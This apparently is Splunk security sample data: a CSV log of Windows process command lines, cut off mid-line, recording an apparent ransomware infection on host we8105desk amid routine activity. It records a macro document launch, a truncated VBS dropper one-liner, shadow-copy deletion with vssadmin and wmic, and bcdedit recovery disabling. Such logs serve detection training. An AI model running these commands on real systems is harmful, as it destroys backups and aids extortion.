host,CommandLine,EventCode we8105desk,"taskhost.exe C:\Windows\system32\defrag.exe -c",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"""C:\Windows\system32\w32tm.exe"" /stripchart /computer:we9041srv.waynecorpinc.local /dataonly /samples:1",1 we8105desk,"""C:\Windows\system32\PING.EXE"" we9041srv.waynecorpinc.local /n 2",1 we8105desk,"""C:\Windows\system32\w32tm.exe"" /query /source",1 we8105desk,"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES958E.tmp"" ""c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC958D.tmp""",1 we8105desk,"""C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\l62oeljq.cmdline""",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES93AA.tmp"" ""c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC93A9.tmp""",1 we8105desk,"""C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\m7m1p90n.cmdline""",1 we8105desk,"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES936C.tmp"" ""c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC936B.tmp""",1 we8105desk,"""C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\skj1oiou.cmdline""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"C:\Windows\System32\sdiagnhost.exe -Embedding",1 we8105desk,"C:\Windows\System32\svchost.exe -k swprv",1 we8105desk,"""taskhost.exe""",1 we8105desk,"C:\Windows\system32\vssvc.exe",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe21_ Global\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"C:\Windows\system32\mcbuilder.exe",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations",1 we8105desk,"C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation",1 we8105desk,"C:\Windows\system32\lpremove.exe",1 we1149srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we1149srv,"C:\Windows\system32\sc.exe start wuauserv",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe20_ Global\UsGthrCtrlFltPipeMssGthrPipe20 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"C:\Windows\system32\svchost.exe -k defragsvc",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""taskhost.exe""",1 we8105desk,"C:\Windows\system32\defrag.exe -c",1 we8105desk,"C:\Windows\system32\aitagent.EXE",1 we8105desk,"C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate",1 we8105desk,"taskhost.exe $(Arg0)",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe19_ Global\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe18_ Global\UsGthrCtrlFltPipeMssGthrPipe18 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe17_ Global\UsGthrCtrlFltPipeMssGthrPipe17 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"ping -n 1 127.0.0.1",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"taskkill /t /f /im ""osk.exe""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"/d /c taskkill /t /f /im ""osk.exe"" > NUL & ping -n 1 127.0.0.1 > NUL & del ""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"" > NUL",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-110916_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-110916 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ""1""",1 we8105desk,"""C:\Windows\System32\WScript.exe"" ""C:\Users\bob.smith.WAYNECORPINC\Desktop\# DECRYPT MY FILES #.vbs""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" SCODEF:2404 CREDAT:79874",1 we8105desk,"""C:\Windows\system32\NOTEPAD.EXE"" C:\Users\bob.smith.WAYNECORPINC\Desktop\# DECRYPT MY FILES #.txt",1 we8105desk,"""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" SCODEF:2404 CREDAT:79873",1 we8105desk,"""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" -nohome",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe15_ Global\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe14_ Global\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"""C:\Windows\explorer.exe""",1 we8105desk,"taskhost.exe $(Arg0)",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe13_ Global\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe12_ Global\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe11_ Global\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe10_ Global\UsGthrCtrlFltPipeMssGthrPipe10 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"C:\Windows\system32\AUDIODG.EXE 0x4d4",1 we8105desk,"rundll32.exe C:\Windows\system32\hotplug.dll,HotPlugEjectVetoed \\.\pipe\PNP_HotPlug_Pipe_1.{339df01b-6d4c-4d9a-b389-98d62839f1b0}",1 we8105desk,"C:\Windows\system32\DeviceDisplayObjectProvider.exe -Embedding",1 we8105desk,"C:\Windows\system32\DeviceDisplayObjectProvider.exe -Embedding",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11099_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11099 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ""1""",1 we8105desk,"""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" SCODEF:4576 CREDAT:71937",1 we8105desk,"""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" -nohome",1 we8105desk,"""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL D:\Work Stuff\013\013366.pdf",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"""C:\Windows\explorer.exe""",1 we8105desk,"C:\Windows\system32\AUDIODG.EXE 0x2c4",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"""C:\Windows\explorer.exe""",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\System32\slui.exe -Embedding",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""C:\Windows\System32\bcdedit.exe"" /set {default} bootstatuspolicy ignoreallfailures",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""C:\Windows\System32\bcdedit.exe"" /set {default} recoveryenabled no",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""C:\Windows\system32\wbem\wmic.exe"" shadowcopy delete",1 we8105desk,"C:\Windows\System32\svchost.exe -k swprv",1 we8105desk,"C:\Windows\system32\vssvc.exe",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""C:\Windows\system32\vssadmin.exe"" delete shadows /all /quiet",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}",1 we8105desk,"consent.exe 928 274 0000000001CCA4D0",1 we8105desk,"""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe""",1 we8105desk,"""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe""",1 we8105desk,"""C:\Windows\SysWOW64\QqJXZrBKCk72XzRgZs\AdapterTroubleshooter.exe""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}",1 we8105desk,"consent.exe 928 502 00000000031D8160",1 we8105desk,"""C:\Windows\SysWOW64\QqJXZrBKCk72XzRgZs\AdapterTroubleshooter.exe""",1 we8105desk,"consent.exe 928 274 0000000001CCA4D0",1 we8105desk,"consent.exe 928 274 0000000001CCA4D0",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}",1 we8105desk,"consent.exe 928 274 0000000001CCA4D0",1 we8105desk,"""C:\Windows\SysWOW64\explorer.exe""",1 we8105desk,"""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe""",1 we8105desk,"ping -n 1 127.0.0.1",1 we8105desk,"taskkill /t /f /im ""121214.tmp""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"/d /c taskkill /t /f /im ""121214.tmp"" > NUL & ping -n 1 127.0.0.1 > NUL & del ""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"" > NUL",1 we8105desk,"""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe""",1 we8105desk,"""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp""",1 we8105desk,"""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""C:\Windows\System32\cmd.exe"" /C START """" ""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp""",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"""C:\Windows\explorer.exe""",1 we8105desk,"C:\Windows\splwow64.exe 8192",1 we8105desk,"""C:\Windows\System32\WScript.exe"" ""C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\20429.vbs""",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 "2016-08-24T10:43:21.000-0600","cmd.exe /V /C set ""GSI=%APPDATA%\%RANDOM%.vbs"" && (for %i in (""DIm RWRL"" ""FuNCtioN GNbiPp(Pt5SZ1)"" ""EYnt=45"" ""GNbiPp=AsC(Pt5SZ1)"" ""Xn1=52 This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. cho %~i)>""!GSI!"" && start """" ""!GSI!""",we8105desk we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"wmiadap.exe /R /T",1 we8105desk,"""C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE""",1 we8105desk,"""C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"" /n /f ""D:\Miranda_Tate_unveiled.dotm""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"""C:\Windows\explorer.exe""",1 we8105desk,"C:\Windows\system32\AUDIODG.EXE 0x8b8",1 we9041srv,"""dwm.exe""",1 we9041srv,"""LogonUI.exe"" /flags:0x0",1 we9041srv,"winlogon.exe",1 we9041srv,"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",1 we9041srv,"\SystemRoot\System32\smss.exe 00000000 00000050",1 we8105desk,"choice /T 1 /C X /D X /N",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"cmd /c C:\Windows\temp\nessus_W7GLH62C.bat",1 we1149srv,"""dwm.exe""",1 we1149srv,"""LogonUI.exe"" /flags:0x0",1 we1149srv,"winlogon.exe",1 we1149srv,"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",1 we1149srv,"\SystemRoot\System32\smss.exe 00000000 00000050",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"C:\Windows\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exe",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"sc start tenable_mw_scan type=1 output=nessus_SFBBT7QA.txt",1 we9041srv,"choice /T 1 /C X /D X /N",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c C:\Windows\temp\nessus_ZCHPYH15.bat",1 we8105desk,"schtasks /query /XML",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"cmd /c ""schtasks /query /XML > %SystemRoot%\TEMP\nessus_VPG2T4UF.TMP & ren %SystemRoot%\TEMP\nessus_VPG2T4UF.TMP nessus_VPG2T4UF.TXT""",1 we9041srv,"C:\Windows\tenable_mw_scan_142a90001fb65e0beb1751cc8c63edd0.exe",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"sc start tenable_mw_scan type=1 output=nessus_QYVJLVDT.txt",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we9041srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we8105desk,"netsh advfirewall show allprofiles firewallpolicy",1 we8105desk,"cmd /c netsh advfirewall show allprofiles firewallpolicy",1 we8105desk,"netsh advfirewall firewall show rule name=all verbose",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"cmd /c netsh advfirewall firewall show rule name=all verbose > %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP & cmd /c netsh advfirewall show allprofiles firewallpolicy >> %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP & move %SystemRoot%\TEMP\nessus_OCREA4YZ.TMP %SystemRoot%\TEMP\nessus_OCREA4YZ.TXT",1 we9041srv,"schtasks /query /XML",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c ""schtasks /query /XML > %SystemRoot%\TEMP\nessus_W426FMMY.TMP & ren 